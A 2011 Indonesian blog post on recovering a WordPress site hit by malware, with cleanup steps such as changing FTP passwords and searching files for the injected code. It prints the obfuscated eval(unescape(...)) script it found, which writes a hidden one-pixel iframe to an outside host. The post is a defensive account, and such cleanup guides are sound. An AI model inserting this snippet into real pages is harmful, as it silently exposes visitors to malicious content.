// On-Selasa, 22 Februari 2011
Kemari blog sobatPC seakan beku. Ketika diakses proses loading terlihat sepintas, setalah itu halaman menjadi blank alias kosong. Untuk admin juga sama, semuanya tidak bisa diakses. Saya sempat bingung dan berbagai spekulasi muncul. Pikiran pertama saya arahkan ke plugin. Tetapi dengan berfikir hari kemarin saja masih jalan semua dan selama 3 hari ini saya tidak otak atik plugin, jadi spekulasi plugin yang bermasalah saya tinggalkan. Sebelum kejadian ini memang sobatPC sudah menunjukan gejala kerusakannnya, tetapi masih bisa dipaksakan dengan menggunakan Google chrome dan IE, yang pada saat itu firefox sudah tidak bisa lagi digunakan. Tetapi setelah beberapa hari kemudian semuanya beku, tidak ada yang bisa diakses.
Dari sinilah saya mulai pusing (he….) soalnya pulang kerja saja sudah jam 5 sore, ditambah dengan wordpress saya yang error, wah tambah pusing jadinya. Tapi dengan berbekal tekan yang kuat saya terus berusaha mencari jalan keluar untuk mengembalikan blog saya.
Kembali kemasalah blog yang beku. Dalam loading blog saya terlihat ada yang aneh di status bar browser. Disana terlihat blog saya meloading sebuah alamat yang agak mencurigakan, karena saya merasa belum pernah mengunjungi alamat tersebut.
Maka saya coba mengakses alamt yang diloading oleh blog saya, tapi hasilnya nihil. Hanya muncul pesan forbidden saja. Nah, karena penasaran situs apa saja yang diloading blog saya, maka saya bermaksud lihat di source code melewati browser. Dan dari sinilah saya temukan jawabannya.
dalam source code tidak ditampilkan kode blog saya melainkan hanya kode-kode aneh seperti dibawah ini:
<script>eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%32%38%36%33%31%32%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29?));</script><!– uy7gdr5332rkmn –>
Kode aneh tersebut terus saya pasang di google guna mencari jawabannya. Tapi karena karakter yang terlalu panjang maka google tentu tidak bisa mencari secara maksimal, maka kemudian saya ambil karakter terakhir saja, dan dari situ banyak ditemukan jawabannya.
Intinya, blog saya terkena serangan malware yang menyusupkan kode jahat tersebut kedalam script blog saya. Malwere tersebut menyusup ke blog saya dengan memanfaatkan password yang tersimpan dalam browser saya dan password FTP.
Untuk mengatasi masalah malware tersebut berikut beberapa langkahnya:
- Remove seluruh password yang tersimpan didalam browser anda
- Segera ganti password FTP anda, jika perlu cpanel hosting anda
- Scan komputer anda dari kemungkinan masih adanya malware. Anti virus kemungkinan tidak mendeteksi malware
- Hapus kode diatas yang terdapat pada script blog anda. Untuk mudahnya anda dowload semua file blog anda, kemudian search dan replace kode yang terdapat dalam file blog tersebut menggunakan software TextCrawler (yang terbaru versi 2.0, silahkan cari digoogle banyak yang menyediakannya). Software ini mampu mencari text yang ada didalam file dan lintas antar file dan folder.
- Untuk menghemat waktu dalam mengupload kembali, pilih saja file yang terinfeksi, biasanya yang mempunyai nama index dan default. Atau perhatikan saja file yang ditemukan menggunakan TextCrawler, setalah itu upload file tersebut setelah di hapus kode malwarenya.
- berdoa semoga pekerjaan anda lancar dan berhasil
- Setalah selesai, coba akses kembali blog anda, maka kemungkinan besar blog anda sudah sehat kembali
- Mintalah peninjauan malware melalui Google Webmaster Tools (Diagnostics -> Malware) atau di situs ini http://www.UnmaskParasites.com/
- Jika tetap tidak bisa, maka langkah terakhir adalah anda harus menginstall ulang script.
Demikian apa yang bisa saya share, semoga bisa bermanfaat bagi pengunjung sobat PC, dan saya mohon maaf beberapa waktu yang lalu sobatPC tidak bisa diakses oleh anda. Terima kasih
sumber:http://sobatpc.com/memperbaiki-blog-wordpress-dari-serangan-malware-uy7gdr5332rkmn/#more-752
